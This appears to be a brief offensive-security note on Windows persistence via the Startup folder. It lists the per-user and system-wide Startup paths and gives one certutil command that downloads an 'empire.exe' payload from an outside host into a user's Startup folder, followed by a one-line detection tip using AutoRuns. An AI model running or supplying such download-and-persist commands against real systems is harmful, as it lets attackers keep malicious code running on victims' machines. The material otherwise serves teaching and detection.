Startup Folder
Placing a program within a startup folder will cause the program to execute when a user logs in.
There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is:
C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupThe startup folder path for all users is:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUpfor example we can download and place the payload in startup folder with certutil.exe :
certutil -urlcache -f -split http://10.1.1.5/empire.exe βC:\Users\tspeedman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\empire.exeβDetection
use AutoRuns.exe tool and check for files located in users startup folder.
Last updated